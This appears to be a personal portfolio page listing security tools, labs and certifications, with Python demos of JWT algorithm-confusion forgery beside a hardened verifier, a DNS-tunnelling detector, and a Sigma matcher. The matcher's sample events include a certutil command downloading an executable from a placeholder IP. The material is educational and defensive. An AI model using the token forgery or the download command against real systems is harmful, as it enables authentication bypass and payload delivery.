Handpicked tools, platforms, certifications, and references used in real offensive security practice. No padding, only what actually gets used.
Nmap (nmap.org): The gold standard for network discovery and port scanning. Used in lab and authorised review work for service enumeration and OS fingerprinting.
Subfinder (GitHub): Fast passive subdomain discovery using multiple data sources. Essential for initial attack surface mapping before any active recon.
Katana (GitHub): Next-generation crawling and spidering framework from Project Discovery. Discovers endpoints, JS files, and hidden paths automatically.
Shodan (shodan.io): Search engine for internet-connected devices. Invaluable for passive recon: find exposed services, open ports, and misconfigured assets without sending a packet to the target.
theHarvester (GitHub): Gathers emails, domains, subdomains, IPs and URLs from multiple public sources. Useful for early passive research and footprint mapping.
httpx (GitHub): Fast multi-purpose HTTP toolkit for probing web servers. Pairs well with Subfinder for rapid alive-host detection and status-code fingerprinting.
Burp Suite (Download Free): The industry standard for web app pentesting. Used for intercepting requests and testing for IDOR, XSS, SQLi, auth flaws, and business logic bugs.
sqlmap (sqlmap.org): Automated SQL injection detection and exploitation. Supports all major SQL databases and injection techniques. Lab use only.
Nuclei (GitHub): Fast template-based vulnerability scanner. 9,000+ community templates covering CVEs, misconfigurations, exposed panels, and more.
ffuf (GitHub): Fast web fuzzer written in Go. Used for directory and file discovery, parameter fuzzing, and virtual host enumeration.
PortSwigger Web Security Academy (Start Learning): The best free web security lab platform available. Covers every OWASP Top 10 category with hands-on, guided labs.
OWASP ZAP (zaproxy.org): Open-source web application security scanner. Good for automated baseline scanning and integration into CI/CD pipelines.
jwt_tool (GitHub): The definitive tool for testing JSON Web Tokens. Covers signature algorithm confusion (alg:none, and RS256 to HS256 key confusion where the server's public key becomes the HMAC secret), weak secrets, claim tampering, and key injection attacks. Essential for any API security review.
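The two algorithm-confusion bugs jwt_tool probes are easier to reason about when the vulnerable and the fixed verifier sit side by side. The following is an added example written for this page, not code from jwt_tool or from any library; the secret and the public-key PEM are constructed placeholders, and real RS256 verification is deliberately omitted because the flaw is in the algorithm dispatch, not in the RSA maths.

```python
import base64
import hashlib
import hmac
import json

# Constructed key material for the demo (not real keys).
SECRET = b"correct horse battery staple"
PUBLIC_KEY_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    b"CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY\n"
    b"-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, key: bytes) -> str:
    """Mint an HS256 token. An attacker calls this with the victim's public
    key PEM as `key` to exploit RS256 -> HS256 key confusion."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_alg_none(payload: dict) -> str:
    """Unsigned token: header says alg=none and the signature part is empty."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(payload)}."


def verify_vulnerable(token: str, key: bytes):
    """Trusts the attacker-controlled header to pick the algorithm and uses the
    one configured key for whatever that algorithm is. Returns the claims or None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    if alg == "none":                      # accepts unsigned tokens outright
        return json.loads(b64url_decode(payload_b64))
    if alg == "HS256":                     # `key` may well be an RSA public key PEM
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None                            # RS256 path intentionally not implemented


def verify_hardened(token: str, secret: bytes, expected_alg: str = "HS256"):
    """Pins the algorithm server-side, never lets the header choose it, and
    requires a non-empty signature compared in constant time."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        signature = b64url_decode(sig_b64)
    except ValueError:
        return None
    if header.get("alg") != expected_alg:  # exact match, so "None"/"nOnE" fail too
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    forged = forge_alg_none({"sub": "admin"})
    confused = sign_hs256({"sub": "admin"}, PUBLIC_KEY_PEM)
    print("alg=none  vulnerable:", verify_vulnerable(forged, SECRET), " hardened:", verify_hardened(forged, SECRET))
    print("RS->HS    vulnerable:", verify_vulnerable(confused, PUBLIC_KEY_PEM), " hardened:", verify_hardened(confused, SECRET))
```

The fix is the same regardless of library: configure the accepted algorithm and key type on the server, and treat the token header as untrusted input that must merely agree with that configuration.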
Arjun (GitHub): Discovers hidden HTTP parameters on API endpoints and web forms. Uncovers mass-assignment candidates, undocumented parameters, and hidden functionality that automated scanners miss.
Kiterunner (GitHub): Context-aware API endpoint discovery tool from Assetnote. Uses route wordlists derived from public API specs, which is far more effective than generic directory bruting for API discovery.
Postman (postman.com): Industry standard for API interaction and testing. Excellent for manually testing REST endpoints, managing auth tokens, building test collections, and chaining requests to test for BOLA and auth bypass.
GraphQL Voyager (GitHub): Visualises GraphQL schemas as an interactive graph. Essential for understanding a GraphQL API's full capability surface: the relationships, queries, and mutations that could be exploited.
OWASP API Security Top 10 (owasp.org): The 2023 edition covers BOLA, Broken Authentication, BOPLA, Unrestricted Resource Consumption, BFLA, SSRF, and more. The definitive reference for any structured API security assessment.
Hashcat (hashcat.net): GPU-accelerated password recovery tool. Supports 350+ hash types including NTLM, bcrypt, SHA-256, MD5, and WPA2. Essential for post-exploitation credential auditing in lab environments.
John the Ripper (openwall.com): Classic, versatile password cracker supporting hundreds of hash formats. Excellent for cracking /etc/shadow entries, ZIP passwords, and common hash types. A good CPU-based complement to Hashcat.
SecLists (GitHub): The most comprehensive collection of wordlists for security testing: passwords, usernames, directory names, subdomains, fuzzing payloads, and more. The first thing to install on any pentest setup.
CrackMapExec / NetExec (GitHub): Swiss army knife for network authentication assessment. Tests credentials against SMB, WinRM, MSSQL, and more in one tool. Invaluable for internal network labs and AD environments. Lab use only.
TryHackMe (tryhackme.com): Browser-based CTF and learning paths covering offensive security, SOC analysis, and cloud security. Ideal for beginners through intermediate. Charlie's personal primary learning platform.
Hack The Box (hackthebox.com): Intermediate-to-advanced labs with retired machines, ProLabs, and CTF challenges. Useful for structured practice once the basics are stable.
TCM Security (tcm-sec.com): Practical courses from industry professionals. Useful for building hands-on offensive security foundations and reporting discipline.
INE (ine.com): Structured training programs covering penetration testing, mobile security, and web application testing. Solid foundations for beginners entering the field.
picoCTF (picoctf.org): Carnegie Mellon's beginner-friendly CTF platform. Excellent entry point for students learning binary exploitation, web, and forensics.
OverTheWire (overthewire.org): Classic wargames (Bandit, Natas, Leviathan) for learning Linux fundamentals, web, and exploitation basics via SSH challenges.
This section only lists credentials and learning evidence backed by the supplied CV, ISC2 certificate, or public profile links. It intentionally avoids target-certification claims.
ISC2 Certified in Cybersecurity (CC), completed 2026, backed by the supplied ISC2 certificate.
Listed in the supplied CV. Related CV-backed items include Web Fundamentals, Pre Security, and Cisco Introduction to Cybersecurity.
Supplied CV evidence lists 149+ TryHackMe rooms, 26 badges, top 3% TryHackMe ranking, and Hack The Box practice.
Splunk (splunk.com): Industry-leading SIEM. Search Processing Language (SPL) is used for log analysis, alert creation, dashboards, and correlation rules in lab and learning contexts.
Elastic Stack (elastic.co): Elasticsearch + Logstash + Kibana, one of the most widely deployed log stacks. Kibana Query Language (KQL) for threat hunting, Elastic Defend for EDR, Winlogbeat/Filebeat or Elastic Agent for log shipping. Self-hostable, with the core SIEM features available on the free Basic licence.
Microsoft Sentinel (azure.microsoft.com): Cloud-native SIEM built on Azure Log Analytics. Kusto Query Language (KQL, a different language from Kibana's KQL despite the shared acronym) for hunting and detection, with native connectors for M365, Defender for Endpoint and Entra ID (formerly Azure AD), plus analytics rules, workbooks, and automation.
Wireshark (wireshark.org): The definitive network protocol analyser. Used for PCAP analysis, identifying C2 traffic, DNS tunnelling, lateral movement, and suspicious connection patterns. Essential for both SOC work and DFIR.
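"Identifying DNS tunnelling" in a PCAP usually comes down to a few statistics per queried domain: how many distinct subdomains appear, how long they are, and how random they look. The block below is an added example for this page, not Wireshark code; the query names are constructed to resemble what `tshark -T fields -e dns.qry.name` prints for a capture, the registered-domain split is a deliberate two-label simplification, and the thresholds are illustrative, not tuned.

```python
import hashlib
import math
from collections import defaultdict


def shannon_entropy(text: str) -> float:
    """Bits per character: 'aaaa' -> 0.0, 'ab' -> 1.0, hex noise -> roughly 3.8."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_query(name: str):
    """Return (registered_domain, subdomain). Treating the last two labels as the
    registered domain is wrong for suffixes like co.uk; use the Public Suffix List
    in production (simplification, not a rule)."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile_domains(queries):
    """Per registered domain: query count, distinct subdomains, and the mean
    entropy and length of the subdomain part (dots stripped before scoring)."""
    acc = defaultdict(lambda: {"queries": 0, "subs": set(), "ent": [], "len": []})
    for q in queries:
        domain, sub = split_query(q)
        d = acc[domain]
        d["queries"] += 1
        if sub:
            d["subs"].add(sub)
            d["ent"].append(shannon_entropy(sub.replace(".", "")))
            d["len"].append(len(sub))
    profile = {}
    for domain, d in acc.items():
        n = len(d["ent"])
        profile[domain] = {
            "queries": d["queries"],
            "unique_subdomains": len(d["subs"]),
            "mean_entropy": sum(d["ent"]) / n if n else 0.0,
            "mean_length": sum(d["len"]) / n if n else 0.0,
        }
    return profile


def flag_tunnels(queries, min_unique=8, min_entropy=3.0, min_length=30):
    """Domains that see many distinct, long, high-entropy subdomains: the
    signature of data being pushed through DNS labels. Thresholds are illustrative."""
    return sorted(
        domain
        for domain, s in profile_domains(queries).items()
        if s["unique_subdomains"] >= min_unique
        and s["mean_entropy"] >= min_entropy
        and s["mean_length"] >= min_length
    )


# Constructed sample: ordinary browsing plus 16 chunk-carrying queries whose
# labels are hex digests, as a tunnelling client would emit (example.org is
# playing the attacker's domain here).
NORMAL_QUERIES = [
    "www.example.com", "www.example.com", "mail.example.com", "api.example.com",
    "cdn.example.net", "www.example.net", "example.com", "login.example.com",
]
TUNNEL_QUERIES = [
    hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:48] + ".t.example.org"
    for i in range(16)
]
SAMPLE_QUERIES = NORMAL_QUERIES + TUNNEL_QUERIES

if __name__ == "__main__":
    for domain, stats in sorted(profile_domains(SAMPLE_QUERIES).items()):
        print(domain, stats)
    print("suspected tunnels:", flag_tunnels(SAMPLE_QUERIES))
```

Expect false positives from CDNs, anti-virus cloud lookups and DKIM/SPF-heavy mail domains, which also produce long hash-like labels; the per-domain profile is what lets an analyst triage those quickly rather than alerting on single queries.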
Sysmon (Microsoft Sysinternals): Windows System Monitor provides rich endpoint telemetry including process creation (Event ID 1), network connections (Event ID 3), file creation (Event ID 11), and registry value modification (Event ID 13). The foundation of effective Windows endpoint detection.
Volatility (volatilityfoundation.org): The gold standard for memory forensics. Extracts processes, network connections, registry hives, injected code, and malware artefacts from RAM dumps. Used for malware analysis, incident response, and identifying fileless attacks.
CyberChef (gchq.github.io): GCHQ's Swiss Army knife for data analysis. Decodes Base64, deobfuscates malware strings, converts timestamps, defangs IOCs, extracts domains from URLs, and runs 300+ operations in a drag-and-drop interface. Daily analyst tool.
Sigma (GitHub): Open standard for SIEM-agnostic detection rules. Sigma rules are converted to SPL, KQL, Lucene, and more by pySigma backends. The preferred format for writing and sharing detection logic across SIEM platforms.
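A Sigma rule is just a set of field selections plus a condition, and a Sysmon Event ID 1 record is just a dictionary of those fields, so the matching semantics (case-insensitive strings, `contains`/`endswith` modifiers, `all` on list values, `selection and not filter`) can be shown in a few lines. The block below is an added example for this page: it is not pySigma and not a rule from the Sigma repository. The rule is written as the Python equivalent of its YAML so no YAML library is needed, the Sysmon events are constructed, and the `deploy.exe` parent used by the filter is a hypothetical deployment agent assumed for the demo.

```python
# Constructed Sigma rule, expressed as the Python equivalent of the rule's YAML.
# Field names are Sysmon Event ID 1 (process creation) fields.
SIGMA_RULE = {
    "title": "Certutil download via URL cache",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["urlcache", "http"],
        },
        "filter": {
            # Hypothetical benign parent assumed for the demo, not a real exclusion.
            "ParentImage|endswith": "\\deploy.exe",
        },
        "condition": "selection and not filter",
    },
}


def _match_value(value, pattern, modifiers):
    """Sigma string matching is case-insensitive; modifiers change the test."""
    if value is None:
        return False
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return p in v
    if "startswith" in modifiers:
        return v.startswith(p)
    if "endswith" in modifiers:
        return v.endswith(p)
    return v == p


def _match_field(event, key, patterns):
    """'Field|mod1|mod2': list values are OR-ed unless the 'all' modifier is set."""
    field, *modifiers = key.split("|")
    if not isinstance(patterns, list):
        patterns = [patterns]
    hits = [_match_value(event.get(field), p, modifiers) for p in patterns]
    return all(hits) if "all" in modifiers else any(hits)


def match_selection(event, selection):
    """Every field entry in a selection map must match (AND)."""
    return all(_match_field(event, k, v) for k, v in selection.items())


def eval_condition(condition, results):
    """Evaluates 'a and not b or c' left to right. No parentheses or
    'x of' expressions: enough for the common 'selection and not filter'."""
    value, op, negate = None, None, False
    for tok in condition.split():
        if tok in ("and", "or"):
            op = tok
        elif tok == "not":
            negate = not negate
        else:
            term = results[tok] != negate
            negate = False
            if value is None:
                value = term
            elif op == "and":
                value = value and term
            else:
                value = value or term
    return bool(value)


def sigma_match(rule, event):
    det = rule["detection"]
    results = {name: match_selection(event, sel) for name, sel in det.items() if name != "condition"}
    return eval_condition(det["condition"], results)


def run_detection(rule, events):
    """ProcessIds of the events the rule fires on."""
    return [e["ProcessId"] for e in events if sigma_match(rule, e)]


# Constructed Sysmon Event ID 1 records (203.0.113.10 is a documentation address).
EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/p.exe C:\\Users\\Public\\p.exe"},
    {"EventID": 1, "ProcessId": 4188, "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil -verify cert.cer"},
    {"EventID": 1, "ProcessId": 4201, "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:\\Windows\\System32\\CERTUTIL.EXE",
     "ParentImage": "C:\\Tools\\deploy.exe",
     "CommandLine": "CERTUTIL.EXE -URLCACHE -f HTTPS://intranet.example/tool.msi tool.msi"},
    {"EventID": 1, "ProcessId": 4300, "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe http-notes.txt"},
]

if __name__ == "__main__":
    print("hits:", run_detection(SIGMA_RULE, EVENTS))
```

The third event shows why case-insensitivity matters: the upper-cased command line still satisfies the selection, and only the parent-process filter suppresses it. Once a rule behaves this way in a toy matcher, pySigma's backends are what turn the same YAML into the SPL or KQL that the Splunk and Sentinel entries above run at scale.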
TheHive (thehive-project.org): Security incident response platform (the version 4 branch is open-source) with case management, alert triage, observable tracking, and task assignment for SOC teams. Integrates with MISP for threat intelligence correlation. The backbone of structured IR workflows.
MISP (misp-project.org): Malware Information Sharing Platform. Collects, shares, and correlates threat intelligence including IOCs, TTPs, and malware samples. Used by SOC teams to enrich alerts with context from global threat intelligence feeds.
Velociraptor (velocidex.com): Advanced endpoint visibility and forensics tool using VQL (Velociraptor Query Language). Enables rapid artefact collection, live forensics, and threat hunting across fleets of endpoints from a single interface.
VirusTotal (virustotal.com): Analyses files, URLs, IPs, and domains against 70+ antivirus engines and threat intelligence sources. Primary tool for IOC enrichment during alert triage: look up suspicious hashes, domains, and IPs instantly. Uploading a file shares it with the wider VirusTotal community, so prefer hash lookups for sensitive samples.
Maltego (maltego.com): Visual link analysis tool for relationship mapping between people, domains, IPs, and organisations. Community edition is free.
Hunter.io (hunter.io): Finds and verifies professional email addresses associated with a domain. Useful for social engineering assessment scoping.
recon-ng (GitHub): Full-featured web reconnaissance framework with modular design. Automates OSINT collection across dozens of data sources.
OSINT Framework (osintframework.com): Comprehensive directory of OSINT tools organised by data type. Useful reference for finding the right tool for a specific intelligence requirement.
GTFOBins (gtfobins.github.io): Curated list of Unix binaries that can be abused to bypass local security restrictions (sudo rules, SUID bits, capabilities). Useful as a privilege-escalation reference during lab work.
LOLBAS (lolbas-project.github.io): Windows equivalent of GTFOBins: native binaries, scripts, and libraries that can be misused for offensive purposes during authorised labs or scoped work.
HackTricks (book.hacktricks.xyz): The most comprehensive free pentesting methodology and technique reference. Covers everything from initial recon to post-exploitation in depth.
PayloadsAllTheThings (GitHub): Massive repository of useful payloads and bypasses for web application security testing. Covers XSS, SQLi, SSRF, RCE, and dozens more.
OWASP Top 10 (owasp.org): The definitive list of the most critical web application security risks. Understanding this list is the foundation of any web security career.
MITRE ATT&CK (attack.mitre.org): Globally accessible knowledge base of adversary tactics and techniques. Used for threat modelling, red team planning, and detection alignment.